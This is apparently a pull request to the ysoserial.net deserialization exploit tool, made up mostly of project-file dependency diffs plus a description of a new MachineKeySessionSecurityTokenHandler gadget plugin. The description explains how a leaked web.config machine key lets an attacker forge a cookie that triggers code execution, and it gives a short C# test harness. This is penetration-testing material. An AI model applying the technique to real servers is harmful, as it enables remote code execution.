-      <HintPath>..\packages\Microsoft.AspNetCore.Hosting.Abstractions.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.Hosting.Abstractions.dll</HintPath>
-    </Reference>
-    <Reference Include="Microsoft.AspNetCore.Hosting.Server.Abstractions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.AspNetCore.Hosting.Server.Abstractions.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.Hosting.Server.Abstractions.dll</HintPath>
-    </Reference>
-    <Reference Include="Microsoft.AspNetCore.Http, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.AspNetCore.Http.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.Http.dll</HintPath>
-    </Reference>
-    <Reference Include="Microsoft.AspNetCore.Http.Abstractions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.AspNetCore.Http.Abstractions.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.Http.Abstractions.dll</HintPath>
-    </Reference>
-    <Reference Include="Microsoft.AspNetCore.Http.Extensions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.AspNetCore.Http.Extensions.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.Http.Extensions.dll</HintPath>
-    </Reference>
-    <Reference Include="Microsoft.AspNetCore.Http.Features, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.AspNetCore.Http.Features.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.Http.Features.dll</HintPath>
-    </Reference>
-    <Reference Include="Microsoft.AspNetCore.WebUtilities, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.AspNetCore.WebUtilities.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.WebUtilities.dll</HintPath>
-    </Reference>
     <Reference Include="Microsoft.Bcl.AsyncInterfaces, Version=6.0.0.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
       <HintPath>..\packages\Microsoft.Bcl.AsyncInterfaces.6.0.0\lib\net461\Microsoft.Bcl.AsyncInterfaces.dll</HintPath>
-    </Reference>
-    <Reference Include="Microsoft.Extensions.Configuration.Abstractions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.Extensions.Configuration.Abstractions.2.0.0\lib\netstandard2.0\Microsoft.Extensions.Configuration.Abstractions.dll</HintPath>
-    </Reference>
-    <Reference Include="Microsoft.Extensions.DependencyInjection.Abstractions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.Extensions.DependencyInjection.Abstractions.2.0.0\lib\netstandard2.0\Microsoft.Extensions.DependencyInjection.Abstractions.dll</HintPath>
-    </Reference>
-    <Reference Include="Microsoft.Extensions.FileProviders.Abstractions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.Extensions.FileProviders.Abstractions.2.0.0\lib\netstandard2.0\Microsoft.Extensions.FileProviders.Abstractions.dll</HintPath>
-    </Reference>
-    <Reference Include="Microsoft.Extensions.Hosting.Abstractions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.Extensions.Hosting.Abstractions.2.0.0\lib\netstandard2.0\Microsoft.Extensions.Hosting.Abstractions.dll</HintPath>
-    </Reference>
-    <Reference Include="Microsoft.Extensions.Logging.Abstractions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.Extensions.Logging.Abstractions.2.0.0\lib\netstandard2.0\Microsoft.Extensions.Logging.Abstractions.dll</HintPath>
-    </Reference>
-    <Reference Include="Microsoft.Extensions.ObjectPool, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.Extensions.ObjectPool.2.0.0\lib\netstandard2.0\Microsoft.Extensions.ObjectPool.dll</HintPath>
-    </Reference>
-    <Reference Include="Microsoft.Extensions.Options, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.Extensions.Options.2.0.0\lib\netstandard2.0\Microsoft.Extensions.Options.dll</HintPath>
-    </Reference>
-    <Reference Include="Microsoft.Extensions.Primitives, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.Extensions.Primitives.2.0.0\lib\netstandard2.0\Microsoft.Extensions.Primitives.dll</HintPath>
-    </Reference>
-    <Reference Include="Microsoft.Extensions.WebEncoders, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.Extensions.WebEncoders.2.0.0\lib\netstandard2.0\Microsoft.Extensions.WebEncoders.dll</HintPath>
     </Reference>
     <Reference Include="microsoft.identitymodel, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
       <HintPath>..\packages\Microsoft.IdentityModel.7.0.0\lib\net35\microsoft.identitymodel.dll</HintPath>
       <Private>True</Private>
     </Reference>
-    <Reference Include="Microsoft.Net.Http.Headers, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.Net.Http.Headers.2.0.0\lib\netstandard2.0\Microsoft.Net.Http.Headers.dll</HintPath>
-    </Reference>
     <Reference Include="Microsoft.NET.StringTools, Version=1.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
       <HintPath>..\packages\Microsoft.NET.StringTools.17.4.0\lib\net472\Microsoft.NET.StringTools.dll</HintPath>
     </Reference>
-    <Reference Include="Microsoft.Win32.Registry, Version=4.1.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.Win32.Registry.4.4.0\lib\net461\Microsoft.Win32.Registry.dll</HintPath>
-    </Reference>
     <Reference Include="NDesk.Options, Version=0.2.1.0, Culture=neutral, processorArchitecture=MSIL">
       <HintPath>..\packages\NDesk.Options.0.2.1\lib\NDesk.Options.dll</HintPath>
-      <Private>True</Private>
     </Reference>
     <Reference Include="Newtonsoft.Json, Version=12.0.0.0, Culture=neutral, PublicKeyToken=30ad4fe6b2a6aeed, processorArchitecture=MSIL">
       <HintPath>..\packages\Newtonsoft.Json.12.0.3\lib\net45\Newtonsoft.Json.dll</HintPath>
@@ -224,10 +148,15 @@
     <Reference Include="System.Core" />
     <Reference Include="System.Drawing" />
     <Reference Include="System.Drawing.Design" />
-    <Reference Include="System.IdentityModel" />
+    <Reference Include="System.IdentityModel">
+      <Private>False</Private>
+    </Reference>
     <Reference Include="Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
       <SpecificVersion>False</SpecificVersion>
       <HintPath>dlls\Microsoft.PowerShell.Editor.dll</HintPath>
+    </Reference>
+    <Reference Include="System.IdentityModel.Services">
+      <Private>False</Private>
     </Reference>
     <Reference Include="System.Memory, Version=4.0.1.2, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
       <HintPath>..\packages\System.Memory.4.5.5\lib\net461\System.Memory.dll</HintPath>
@@ -242,19 +171,6 @@
     <Reference Include="System.Runtime.Remoting" />
     <Reference Include="System.Runtime.Serialization" />
     <Reference Include="System.Runtime.Serialization.Formatters.Soap" />
-    <Reference Include="System.Security" />
-    <Reference Include="System.Security.AccessControl, Version=4.1.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
-      <HintPath>..\packages\System.Security.AccessControl.4.4.0\lib\net461\System.Security.AccessControl.dll</HintPath>
-    </Reference>
-    <Reference Include="System.Security.Cryptography.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
-      <HintPath>..\packages\System.Security.Cryptography.Xml.4.4.0\lib\net461\System.Security.Cryptography.Xml.dll</HintPath>
-    </Reference>
-    <Reference Include="System.Security.Principal.Windows, Version=4.1.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
-      <HintPath>..\packages\System.Security.Principal.Windows.4.4.0\lib\net461\System.Security.Principal.Windows.dll</HintPath>
-    </Reference>
-    <Reference Include="System.Text.Encodings.Web, Version=4.0.2.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
-      <HintPath>..\packages\System.Text.Encodings.Web.4.4.0\lib\netstandard2.0\System.Text.Encodings.Web.dll</HintPath>
-    </Reference>
     <Reference Include="System.Threading.Tasks.Extensions, Version=4.2.0.1, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
       <HintPath>..\packages\System.Threading.Tasks.Extensions.4.5.4\lib\net461\System.Threading.Tasks.Extensions.dll</HintPath>
     </Reference>
@@ -298,6 +214,7 @@
     <Compile Include="Generators\WindowsPrincipalGenerator.cs" />
     <Compile Include="Helpers\GadgetSurrogates\GetterSettingsPropertyValueSurrogates.cs" />
     <Compile Include="Helpers\LocalCodeCompiler.cs" />
+    <Compile Include="Helpers\MachineKeyHelper.cs" />
     <Compile Include="Helpers\MessagePackGetterSettingsPropertyValueHelper.cs" />
     <Compile Include="Helpers\MessagePackObjectDataProviderHelper.cs" />
     <Compile Include="Helpers\ModifiedVulnerableBinaryFormatters\AdvancedBinaryFormatterParser.cs" />

--- a/ysoserial/ysoserial.csproj
+++ b/ysoserial/ysoserial.csproj
@@ -91,6 +91,9 @@
     <Prefer32Bit>true</Prefer32Bit>
   </PropertyGroup>
   <ItemGroup>
+    <Reference Include="AspNetTicketBridge, Version=1.6.0.0, Culture=neutral, processorArchitecture=MSIL">
+      <HintPath>..\packages\AspNetTicketBridge.1.6.0\lib\netstandard2.0\AspNetTicketBridge.dll</HintPath>
+    </Reference>
     <Reference Include="fastjson, Version=2.1.0.0, Culture=neutral, PublicKeyToken=6b75a806b86095cd, processorArchitecture=MSIL">
       <HintPath>..\packages\fastJSON.2.1.27\lib\net40\fastjson.dll</HintPath>
       <Private>True</Private>
@@ -117,15 +120,87 @@
     <Reference Include="MessagePack.Annotations, Version=2.5.0.0, Culture=neutral, PublicKeyToken=b4a0369545f0a1be, processorArchitecture=MSIL">
       <HintPath>..\packages\MessagePack.Annotations.2.5.94\lib\netstandard2.0\MessagePack.Annotations.dll</HintPath>
     </Reference>
+    <Reference Include="Microsoft.AspNetCore.Authentication, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.AspNetCore.Authentication.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.Authentication.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.AspNetCore.Authentication.Abstractions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.AspNetCore.Authentication.Abstractions.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.Authentication.Abstractions.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.AspNetCore.Authentication.Core, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.AspNetCore.Authentication.Core.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.Authentication.Core.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.AspNetCore.Cryptography.Internal, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.AspNetCore.Cryptography.Internal.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.Cryptography.Internal.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.AspNetCore.DataProtection, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.AspNetCore.DataProtection.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.DataProtection.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.AspNetCore.DataProtection.Abstractions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.AspNetCore.DataProtection.Abstractions.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.DataProtection.Abstractions.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.AspNetCore.Hosting.Abstractions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.AspNetCore.Hosting.Abstractions.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.Hosting.Abstractions.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.AspNetCore.Hosting.Server.Abstractions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.AspNetCore.Hosting.Server.Abstractions.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.Hosting.Server.Abstractions.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.AspNetCore.Http, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.AspNetCore.Http.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.Http.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.AspNetCore.Http.Abstractions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.AspNetCore.Http.Abstractions.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.Http.Abstractions.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.AspNetCore.Http.Extensions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.AspNetCore.Http.Extensions.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.Http.Extensions.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.AspNetCore.Http.Features, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.AspNetCore.Http.Features.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.Http.Features.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.AspNetCore.WebUtilities, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.AspNetCore.WebUtilities.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.WebUtilities.dll</HintPath>
+    </Reference>
     <Reference Include="Microsoft.Bcl.AsyncInterfaces, Version=6.0.0.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
       <HintPath>..\packages\Microsoft.Bcl.AsyncInterfaces.6.0.0\lib\net461\Microsoft.Bcl.AsyncInterfaces.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.Extensions.Configuration.Abstractions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.Extensions.Configuration.Abstractions.2.0.0\lib\netstandard2.0\Microsoft.Extensions.Configuration.Abstractions.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.Extensions.DependencyInjection.Abstractions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.Extensions.DependencyInjection.Abstractions.2.0.0\lib\netstandard2.0\Microsoft.Extensions.DependencyInjection.Abstractions.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.Extensions.FileProviders.Abstractions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.Extensions.FileProviders.Abstractions.2.0.0\lib\netstandard2.0\Microsoft.Extensions.FileProviders.Abstractions.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.Extensions.Hosting.Abstractions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.Extensions.Hosting.Abstractions.2.0.0\lib\netstandard2.0\Microsoft.Extensions.Hosting.Abstractions.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.Extensions.Logging.Abstractions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.Extensions.Logging.Abstractions.2.0.0\lib\netstandard2.0\Microsoft.Extensions.Logging.Abstractions.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.Extensions.ObjectPool, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.Extensions.ObjectPool.2.0.0\lib\netstandard2.0\Microsoft.Extensions.ObjectPool.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.Extensions.Options, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.Extensions.Options.2.0.0\lib\netstandard2.0\Microsoft.Extensions.Options.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.Extensions.Primitives, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.Extensions.Primitives.2.0.0\lib\netstandard2.0\Microsoft.Extensions.Primitives.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.Extensions.WebEncoders, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.Extensions.WebEncoders.2.0.0\lib\netstandard2.0\Microsoft.Extensions.WebEncoders.dll</HintPath>
     </Reference>
     <Reference Include="microsoft.identitymodel, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
       <HintPath>..\packages\Microsoft.IdentityModel.7.0.0\lib\net35\microsoft.identitymodel.dll</HintPath>
       <Private>True</Private>
     </Reference>
+    <Reference Include="Microsoft.Net.Http.Headers, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.Net.Http.Headers.2.0.0\lib\netstandard2.0\Microsoft.Net.Http.Headers.dll</HintPath>
+    </Reference>
     <Reference Include="Microsoft.NET.StringTools, Version=1.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
       <HintPath>..\packages\Microsoft.NET.StringTools.17.4.0\lib\net472\Microsoft.NET.StringTools.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.Win32.Registry, Version=4.1.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
+      <HintPath>..\packages\Microsoft.Win32.Registry.4.4.0\lib\net461\Microsoft.Win32.Registry.dll</HintPath>
     </Reference>
     <Reference Include="NDesk.Options, Version=0.2.1.0, Culture=neutral, processorArchitecture=MSIL">
       <HintPath>..\packages\NDesk.Options.0.2.1\lib\NDesk.Options.dll</HintPath>
@@ -167,6 +242,19 @@
     <Reference Include="System.Runtime.Remoting" />
     <Reference Include="System.Runtime.Serialization" />
     <Reference Include="System.Runtime.Serialization.Formatters.Soap" />
+    <Reference Include="System.Security" />
+    <Reference Include="System.Security.AccessControl, Version=4.1.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
+      <HintPath>..\packages\System.Security.AccessControl.4.4.0\lib\net461\System.Security.AccessControl.dll</HintPath>
+    </Reference>
+    <Reference Include="System.Security.Cryptography.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
+      <HintPath>..\packages\System.Security.Cryptography.Xml.4.4.0\lib\net461\System.Security.Cryptography.Xml.dll</HintPath>
+    </Reference>
+    <Reference Include="System.Security.Principal.Windows, Version=4.1.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
+      <HintPath>..\packages\System.Security.Principal.Windows.4.4.0\lib\net461\System.Security.Principal.Windows.dll</HintPath>
+    </Reference>
+    <Reference Include="System.Text.Encodings.Web, Version=4.0.2.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
+      <HintPath>..\packages\System.Text.Encodings.Web.4.4.0\lib\netstandard2.0\System.Text.Encodings.Web.dll</HintPath>
+    </Reference>
     <Reference Include="System.Threading.Tasks.Extensions, Version=4.2.0.1, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
       <HintPath>..\packages\System.Threading.Tasks.Extensions.4.5.4\lib\net461\System.Threading.Tasks.Extensions.dll</HintPath>
     </Reference>
@@ -253,6 +341,7 @@
     <Compile Include="Helpers\XmlHelper.cs" />
     <Compile Include="Helpers\YamlDocumentHelper.cs" />
     <Compile Include="Plugins\GetterCallGadgetsPlugin.cs" />
+    <Compile Include="Plugins\MachineKeySessionSecurityTokenHandlerPlugin.cs" />
     <Compile Include="Plugins\ThirdPartyGadgetsPlugin.cs" />
     <Compile Include="Plugins\NetNonRceGadgetsPlugin.cs" />
     <Compile Include="Plugins\ActivatorUrlPlugin.cs" />


### PR DESCRIPTION
The [Ysoserial.net](http://ysoserial.net/) tool includes an exploit plugin for the SessionSecurityTokenHandler security issue. However, due to the fact that SessionSecurityTokenHandler employs DPAPI for encryption and decryption, it is often difficult to exploit in most cases.

Nevertheless, Microsoft's documentation on SessionSecurityTokenHandler mentions that for web scenarios requiring a similar security mechanism, one can use the MachineKeySessionSecurityTokenHandler. This class inherits from SessionSecurityTokenHandler and shares similar characteristics. The key difference is that MachineKeySessionSecurityTokenHandler utilizes MachineKey configuration information for encryption and decryption operations. Therefore, as long as the MachineKey configuration information can be obtained (for instance, through a web.config leak), it may be possible to exploit it, making it more susceptible to exploitation compared to SessionSecurityTokenHandler.

https://learn.microsoft.com/en-us/dotnet/api/system.identitymodel.services.tokens.machinekeysessionsecuritytokenhandler?view=netframework-4.8.1
![图片](https://github.com/user-attachments/assets/fd36027a-edaf-470b-bead-4ae2cab91abc)

You can use code like the one below for testing:

```
            string payload = @"<SecurityContextToken xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'>
            	<Identifier xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'>
            		urn:unique-id:securitycontext:1
            	</Identifier>
            	<Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>payload</Cookie>
            </SecurityContextToken>";
            MachineKeySessionSecurityTokenHandler testrce = new MachineKeySessionSecurityTokenHandler();
            XmlReader tokenXML = XmlReader.Create(new StringReader(payload));
            testrce.ReadToken(tokenXML);
```
![图片](https://github.com/user-attachments/assets/23fc7805-40df-478e-ad07-9075ab68c6bb)

After verifying the feasibility of this issue, I proceeded to generate the payload required for MachineKeySessionSecurityTokenHandler.ReadToken(). The format of this payload is similar to that generated by SessionSecurityTokenHandlerPlugin, with the only difference being in the <Cookie> node section of the XML data. MachineKeySessionSecurityTokenHandler relies on MachineKey configuration information for the encryption and decryption of the Cookie, which typically necessitates a complete web environment. However, I discovered a dependency on https://github.com/dmarlow/AspNetTicketBridge (which can be imported via NuGet) that allows for the generation of Cookies using the MachineKeyDataProtector.Protect() method. This requires the provision of information such as validationKey, decryptionKey, decryptionAlg, validationAlg, and purposes. Consequently, I developed this plugin to generate the payload required for MachineKeySessionSecurityTokenHandler.ReadToken().

![图片](https://github.com/user-attachments/assets/24d78674-06fe-4743-aeae-89d2e48acc91)

I have verified this plugin locally, and it functions correctly. However, it appears that my implementation has made significant changes to packages.config and ysoserial.csproj. There may be better implementation approaches available...
